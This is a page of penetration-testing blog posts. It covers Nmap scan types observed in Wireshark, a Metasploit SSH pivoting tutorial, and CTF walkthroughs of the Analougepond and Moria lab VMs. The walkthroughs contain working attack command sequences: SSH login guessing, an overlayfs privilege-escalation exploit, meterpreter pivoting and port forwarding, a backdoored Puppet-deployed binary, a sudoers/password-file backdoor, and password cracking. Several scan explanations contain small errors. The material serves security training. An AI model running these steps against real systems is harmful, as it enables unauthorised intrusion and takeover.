Understanding Nmap Scan with Wireshark

In this article you will learn how to capture network packet using Wireshark when attacker is scanning target using NMAP port scanning method. Here you will notice that how Wireshark captured different network traffic packet for open and close ports.

Lets start!!!

TCP SCAN

Tcp scan will scan for TCP port like port 22, 21, 23, 445 etc and ensure for listening port (open) through 3-way handshake connection between source and destination port. If port is open then source made request with SYN packet, as response destination sent SYN, ACK packet and then source sent ACK packets, at last source again sent RST, ACK packets.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sT -p 445 192.168.1.102

From given image you can observe the result that port 445 is open.

Look over the sequence of packet transfer between source and destination captured through wireshark.

You will notice that it has captured same sequence of flag as described above:

  • Source sent SYN packet to destination
  • Destination sent SYN, ACK to source
  • Source sent ACK packet to destination
  • Source again sent RST, ACK to destination

Let’s figure out network traffic for close port. According to given image it is showing if scanning port is closed then 3-way handshake connection would be not possible between source and destination.

Source sent SYN pack and if port is close the receiver will sent response through RST, ACK.

Type following NMAP command for TCP scan as well as start Wireshark on other hand to capture the sent Packet.

nmap -sT -p  3389 192.168.1.102

From given image you can observe the result that port 3389 is closed.

Look over the sequence of packet transfer between source and destination captured through wireshark.

You will notice that it has captured same sequence of flag as described above:

  • Source sent SYN packet to destination
  • Destination sent RST, ACK packet to source

Stealth Scan

SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively typical and stealthy since it never completes TCP connections.

The port is also considered open if a SYN packet (without the ACK flag) is received in response.

This technique is often referred to as half-open scanning, because you don’t open a full TCP connection. You send a SYN packet, as if you are going to open a real connection and then wait for a response. A SYN, ACK indicates the port is listening (open)

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sS -p  22 192.168.1.102

From given image you can observe the result that port 22 is open.

Look over the sequence of packet transfer between source and destination captured through wireshark

  • Source sent SYN packets to destination
  • Destination sent SYN, ACK packets to source
  • Source sent RST packets to destination

Now figure out traffic for close port using stealth scan. When source sent SYN packet on specific port then if port is closed then destination will reply by sending RST packet.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sS -p  3389 192.168.1.102

From given image you can observe the result that port 3389 is closed.

Look over the sequence of packet transfer between source and destination captured through wireshark

  • Source sent SYN packets to destination
  • Destination sent RST, ACK packets to destination

Fin Scan

A FIN packet is used to terminate the TCP connection between source and destination port typically after the data transfer is complete. In the place of a SYN packet, Nmap start a FIN scan by using a FIN packet.  If port is open then no response will come from destination port when FIN packet is sent through source port.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sF -p 22 192.168.1.102

From given image you can observe the result that port 22 is open.

Look over the sequence of packet transfer between source and destination captured through wireshark

  • Source sent FIN packets to destination
  • Destination sent no reply to source

Similarly if Fin scan is performed against any close then source port will sent FIN packet to specific port and destination will reply by sending RST, ACK packets.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sF -p 3389 192.168.1.102

From given image you can observe the result that port 3389 is close.

Look over the sequence of packet transfer between source and destination captured through wireshark

  • Source sent SYN packets to destination
  • Destination sent RST packets to destination

Null Scan

A Null Scan is a series of TCP packets which hold a sequence number of “zeros” (0000000) and since there are none flags set, the destination will not know how to reply the request. It will discard the packet and no reply will be sent, which indicate that port is open.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sN -p 22 192.168.1.102

From given image you can observe the result that port 22 is open.

Look over the sequence of packet transfer between source and destination captured through wireshark

  • Source sent Null packets to destination
  • Destination sent no reply to source

If the port is closed, the Destination will send an RST, ACK packet in response when source send null packets on specific port

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sF -p 3389 192.168.1.102

From given image you can observe the result that port 3389 is close.

Look over the sequence of packet transfer between source and destination captured through wireshark

  • Source sent Null (none) packets to destination
  • Destination sent RST, ACK to source

UDP Scan

UDP scan works by sending a UDP packet to every destination port; it is a connection less protocol. For some common ports such as 53 and 161, a protocol-specific payload is sent to increase response rate, a service will respond with a UDP packet, proving that it is open. If no response is received after retransmissions, the port is classified as open|filtered. This means that the port could be open, or perhaps packet filters are blocking the communication.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sU -p 161 192.168.1.119

From given image you can observe the result that port 161 is open.

Look over the sequence of packet transfer between source and destination captured through Wireshark

  • Source sent UDP packets to destination
  • Destination sent UDP packet with some data to the source

Similarly if source sent UDP packet on a close port to the destination then destination sent reply with ICMP packet port unreachable with appropriate error.

Type following NMAP command for TCP scan as well as start Wireshark on other hand to capture the sent Packet.

nmap -sU -p 53 192.168.1.119

From given image you can observe the result that port 53 is close.

Look over the sequence of packet transfer between source and destination captured through wireshark

  • Source sent UDP packets to destination
  • Destination sent ICMP packet port unreachable to the source

Xmas Scan

These scans are designed to manipulate the PSH, URG and FIN flags of the TCP header, Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. When source sent FIN, PUSH, and URG packet to specific port and if port is open then destination will discard the packets and will not sent any reply to source.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sX -p 22 192.168.1.102

From given image you can observe the result that port 22 is open.

Look over the sequence of packet transfer between source and destination captured through wireshark

  • Source sent FIN,PUSH and URG packets to destination
  • Destination sent no reply to source

Similarly if source sent FIN, PUSH and URG packets to specific port and if port is closed then destination will sent RST, ACK packets to source.

Type following NMAP command for TCP scan as well as start Wireshark on other hand to capture the sent Packet.

nmap -sX -p 3389 192.168.1.102

From given image you can observe the result that port 3389 is close.

Look over the sequence of packet transfer between source and destination captured through wireshark

  • Source sent FIN,PUSH and URG packets to destination
  • Destination RST, ACK packet to source

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Analougepond VM (CTF Challenge)

Hello friends! Today we are going to take another CTF channeling known as Analougepond which Based on our previous article “SSH pivoting”, if you are aware of ssh pivoting then you can easily breach this vm machine.

The credit for making this vm machine goes to “Knightmare” and it is another boot to root machine where author has hide flag for attacker as the new challenge.

 Lets Breach!!!

 The target holds 192.168.0.108 as network IP; now using nmap lets find out open ports.

nmap -sT -sU 192.168.0.108

From give image you can check port 22 for SSH, 68 for DHCP and 161 for SNMP are open in target network.

Now let’s enumerate for SNMP enumeration using metasploit

This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is “public”

 use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(snmp_enum) > set rhosts 192.168.0.108

msf auxiliary(snmp_enum) > set threads 5

msf auxiliary(snmp_enum) > exploit

 From given image you can read system information, like host IP, hostname, description and etc. you will notice that here I had highlighted contact which contain a name Eric Burdon and location which contains some text “there is a hose in New Orleans they call it………

Here eric could be a hint for username, now let ask from Google for “there is a hose in New Orleans they call it………”.

So when I search for given text in Google, I found that these texts are the lyric of a poem “The House of Rising Sun”. It might be possible that the author knightmare wants to give some password clue through this poem. From given image you can read the highlighted text “the Rising Sun” which could be the password for SSH.

Now let’s enumerate for SSH login using metasploit

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhost 192.168.0.108

msf auxiliary(ssh_login) > set username eric

msf auxiliary(ssh_login) > set password therisingsun

msf auxiliary(ssh_login) >exploit

 As result we had successfully login and obtained command shell session 1of targeted system, more found install version of ubuntu i.e. 14.04.1

If you will search in Google you will come to know that ubuntu 14.04.1 is exploitable to overlayfs privilege escalation.

This module attempts to exploit two different CVEs related to overlayfs. CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55 3.16.0-25 (14.10 default) < 3.16.0-41 3.19.0-18 (15.04 default) < 3.19.0-21 CVE-2015-8660: Ubuntu: 3.19.0-18 < 3.19.0-43 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10) Fedora: < 4.2.8 (vulnerable, un-tested) Red Hat: < 3.10.0-327 (rhel 6, vulnerable, un-tested)

use exploit/linux/local/overlayfs_priv_esc

msf exploit(overlayfs_priv_esc) > set  lhost 192.168.1.105

msf exploit(overlayfs_priv_esc) > set session 1

msf exploit(overlayfs_priv_esc) > exploit -j

This times also we had successfully got command shell session 2 opened of target system.

Now convert command shell (for session 2) into meterpreter shell using following command

sessions -u 2

This will a new session which session 3 for meterpreter shell

meterpreter> ls

meterpreter> cat flag.txt

We have Captured 1st flag successfully!!

When as check network interface configuration in target system I found a new IP 192.168.122.1 on its 3rd interface as shown in given image.

This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

 msf > use post/multi/manage/autoroute 

msf post(autoroute) > set subnet 192.168.122.1

msf post(autoroute) > set session 3

msf post(autoroute) > exploit

meterpreter > arp

Here you can check all IP and MAC address, 192.168.122.2 and 192.168.122.3 will be another target.

Enumerate open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

 use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set rhost 192.168.122.2

msf auxiliary(tcp) > set 1-500

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) > exploit

From result we found port 22 is open which used for SSH.

Move inside into meterperer shell then type following command for port forwarding of port 22 into port 8000 as shown below:

Sessions 3

Portfwd add -l 8000 -p 22 -r 192.168.122.2

Now login into SSH server through localhost with forwarded port

Ssh localhost -p 8000

From given image you can read the massage again it is a hint for username as “sandieshaw”; now let ask from Google for his famous song to get some hint for password.

After searching on google we guessed that the password should be sandieshaw’s famous song “puppetonastring”.

Now with this password we connect to sandieshaw through ssh.

After connecting to sandieshaw through ssh we found that we have to root this system.

After looking through the files on this system we found that Puppet is running on this system.

Among those files we find that a puppet file contains instructions to copy spin file in root access after ensuring it is present in the /tmp/ folder of the system.

Then we go into the files folder we found two files one in c language and another an executable file.  Opening the c file, we found it is the code for spinning pipe. Now we replace the c executable file with our file that gives the root access to the system.

The puppet file should execute this as root user and we will get the root shell to server.

We then come back to the meterpreter shell and upload it to the current user eric.

meterpreter > upload /root/Desktop/spin.c

After upload it into the system we compile it and send it to the sandieshaw using ssh.

scp spin sandieshaw@192.168.122.2:/home/sandieshaw

Now we replace the spin file in the /etc/puppet/modules/wiggle/files/ with our spin file.

The spin is replaced, now we have to wait for the puppet file to replace our spin file to that in /tmp/

After waiting for some time we execute the spin file present in /tmp/ folder.

 

Now we have the root shell, moving into the /root/protovision folder we found a flag that is hexadecimal format.

After converting it we found a base64 encoded inverse string.

After reversing the string and decoding it we found that it was a link to a youtube video.

Then we moved on to the other files jim and melvin didn’t had anything significant so we moved to the folder .I_have_you_now. There we found a folder .a, to check how many folders were there inside we searched for all the folders inside with command:

find . -type d

We found that it goes all the way to .z, we move to this location to see its content.

We found two files one in gpg encryption and another readable file then we decode this file using command:

gpg nleeson_key.gpg

This will ask a passphrase, the password is secret which is hinted in the video.

Opening the file we found that it was a private key. So we removed the permissions of the file using:

chmod 600 nleeson_key

Then we look at the content of the other file it displayed a single word joshua.

During our network scan we found another ip 192.168.122.3 that had ssh open but we couldn’t connect to it.

Now we try to connect to it using the private key we found.

After guessing a few users we found that nleeson was the user for the system.

using the key will ask for a passphrase and the password is joshua.

We connected to the system 192.168.122.3. After looking around we couldn’t find anything, so we went back into the root of 192.168.122.2. Here after looking through the files we found that 192.168.122.2 was the puppet server and 192.168.122.3 was the puppet client. We found a file called barringsbank-passwd that held all the username and password of 192.168.122.3.

So we added a new user ignite to this file by opening this file in vim.

Linux uses md5 salt hashes as password so we create an md5 hash using ignite and xyz as salt.

Then we add our user to sudoers to gain root access.

Then we give our new user permissions same as root.

Then we connect to 192.168.122.3 through ssh and using the username and password we just created.

Now we have to wait for some time for the puppet server to update the sudoers, so that our user can have root access.

Then we go to root shell using sudo su.

We move into the root folder and find an image file me.jpeg.

We then copy the image file to eric using ssh.

scp me.jpeg eric@192.168.1.119:/home/eric/

Then we download the file from eric to our local system through metasploit. We go to our meterpreter shell and download the me.jpeg to our system.

meterpreter > cd eric/

meterpreter > download me.jpeg /root/Desktop/

We used to exiftool on this file and found nothing so we performed steganography using steghide.

First we check if there is any file hidden behind this image using command:

steghide –info me.jpeg

The passphrase to this file is reticulatingsplines, I found it after various attempts.

Performing steganography we found a file hidden text file.

We extract the text file using steghide, we use the following command:

steghide extract -sf me.jpeg

It will again ask for an password i.e. reticulatingsplines.

After extracting the file we found that it is encrypted in hexadecimal format.

After converting the file from hexadecimal we found that the text was again encrypted in base64 format.

The text contains recurring gACI phrase that doesn’t allow it to be converted from base64 format.

After removing it we found that the text was inversed after reversing and decoding it we got the final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

SSH Pivoting using Meterpreter

If you are aware of SSH tunneling then you can easily understand SSH pivoting, if not then don’t worry read SSH tunneling from here.   

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.0.109

msf auxiliary(ssh_login) > set username raj

msf auxiliary(ssh_login) > set password 123

msf auxiliary(ssh_login) > exploit

From given image you we can observe that command shell session 1 opened

Now convert command shell into meterpreter shell through following command

Session –u 1

From given image you can observe that Meterpreter session 2 opened

Sessions

 Hence if you will count then currently attacker has hold 2 sessions, 1st for command shell and 2nd for meterpreter shell of SSH server.

Check network interface using ifconfig command

From given image you can observe two network interface in victim’s system 1st for IP 192.168.0.109 through which attacker is connected and 2nd for IP 192.168.10.1 through which SSH client (targets) is connected.

Since attacker belongs to 192.168.0.1 interface and client belongs to 192.168.10.0 interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 192.168.10.0 network attacker need run the post exploitation “autoroute”.

This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 

msf post(autoroute) > set subnet 192.168.10.0

msf post(autoroute) > set session 2

msf post(autoroute) > exploit

This time we are exploiting SSH ignite (local client) therefore we are going to use same module for it that had used above for SSH raj, only need to change information inside exploit.

 msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.10.2

msf auxiliary(ssh_login) > set username ignite

msf auxiliary(ssh_login) > set password 1234

msf auxiliary(ssh_login) > exploit

 From given image you can see another command shell 3 opened, if you will count then total attack has hold 3 sessions, two for SSH server and one for SSH client.

 Sessions

  1. Command shell for SSH raj (192.168.0.109:22)
  2. Meterpreter shell for SSH raj (192.168.0.109)
  3. Command shell for SSH ignite (192.168.10.2:22)

Sessions 3

Now attacker is command shell of SSH ignite (client), let’s verify through network configuration.

Ifconfig

From given you can observe the network IP is 192.168.10.2

 Pivoting is Dangerous but enjoyable network attack 

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Moria: 1.1 (CTF Challenge)

Today I found a Vulnerable Lab based on the world of Lords of The Rings. So get on your Gandalf mode to solve this fun Vulnerable Lab Moria 1.2., we are going to download the VM Machine from here.

The credit for developing this VM machine is goes to Abatchy. It is a Boot2Root Lab.

Note: According to author you don’t need LOTR knowledge to hack this VM, but trust me, you need it.

Let’s Breach!!!

As always, Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.125 but you will have to find your own)

netdiscover

Use nmap command for port enumeration

nmap -sV 192.168.1.125

As you can see port 21 for ftp, port 22 for ssh and port 80 for http are open, so let’s explore port 80 through Browser.

After Browsing I found this Image with label Gates of Moria. I decided to do a bit research on the text written in given below the image. After searching through some wiki pages, I found its translation “Say Friend and Enter” where Mellon means Friend.

So Friend or Mellon must be a password. Keeping that in mind let’s move forward. Here I decided to scan the target directory using dirb scan. Now open the terminal in Kali Linux and type the following command:

dirb http://192.168.1.125/

From scanning result I choose the highlighted directory for further enumeration.

http://192.168.1.125/w/

So I opened this directory in the Browser and found another directory inside it i.e h/

On opening it I got another directory and so on until it completes path /w/h/i/s/p/e/r. Here we find the last directory named the_abyss/

On opening the_abyss, I got some text as shown in image. Fundin:”That human will never save us!”

Tried to look at source code but nothing then again try to refresh the page and then found this above given text get changed into another the text, again refresh the page again text change into “Knock Knock”.

Firstly seemed weird but then I refreshed again and it changed again hence text were changing randomly when I refresh the web page.

So I decided to do a dirb scan but it gave no result, so I did an extension dirb scan as shown.

dirb http://192.168.1.125/w/h/i/s/p/e/r/the_abyss/ -X .txt .img .html

This dirb scanner scans for a particular extenstion which is specified like .txt or .img etc.

Aha! Found a file namedrandom.txt.

So I opened it through the browser and found all the text that was coming on refreshing page in a single webpage as shown.

This text contains a lot of names like Balin, Oin, Ori, Fundin, Nain, Eru, Balrog, I noted them because they might be usernames or passwords.

Now I tried to connect with ftp port.

ftp 192.168.1.125

 

It greeted with Welcome Balrog

And I knew it must be the username because it was in the random.txt too but for password, I had tried multiple names which I found previously and then I remembered the text form the image, “Say friend and enter”. I entered Friend but login failed then tried with Mellow and got login successfully.

Therefore for FTP Login give following credential:

Username: Balrog

Password: Mellow

NOTE: – If you get an error, restart VM and also try multiple times with the above username and password.

After login, I tried pwd command and got the path to be /prision. I looked around it in hope of a flag but didn’t found any hint for flag. Then I found var folder and move inside inside.

Then I got to /var/www/html here I found this folder QlVraKW4fbIkXau9zkAPNGzviT3UKntl

When opened it in browser I found a table having two columns for Prisoner’s name and Passkey as shown in given image.

As always, I searched the source code for some hint. From View Source page I found the “salt” which can be used to decrypt the MD5 Password.

After trying different kinds of formats to decrypt above MD5 password I created a file with name and passkey and salt in this format 

Prisoner’s Name:Passkey$Salt

Name it whatever you want (Here I named it passwords and saved it on my kali Desktop).

Now we will run John The Ripper, Dynamic -6 on this file to decrypt it. By using this command in my kali terminal

john–form=dynamic_6 /root/Desktop/lol

These look like login credentials.

After trying all user credentials decrypted to login in ssh, I got success with

SSH Login

Username :Ori

Password :spanky

Now login into ssh using above credential

ssh Ori@192.168.1.125

Here we got the bash shell. Now I tried multiple commands in search of a flag in ls-al, I found a poem.txt file, which contains a poem. But it didn’t find any flag inside it.

Then I looked into.ssh/ directory And found know_hosts file, and id_rsa file which contained the private key and then open these file one by one,

cat id_rsa

Copy the entire text found inside id_rsa in a text file and save as id_rsa.

Now open another file known_host with cat command, here you will find host is “127.0.0.1”, let use these information for ssh login for root user.

ssh -i id_rsa root@127.0.0.1

I got the ROOT.

But let’s finish it properly.  So I tried ls -la scan to get a flag. And I found a flag.txt inside flag.txt I got the Final Message “All that is gold does not glitter”.

It was an adventurous and learning experience and I would like to thank Abatchy for creating such a fun VM Lab.

Author: Pavandeep Singh is An Ethical HackerCyber Security Expert, Penetration Tester, India. Contact here

Related Posts Plugin for WordPress, Blogger...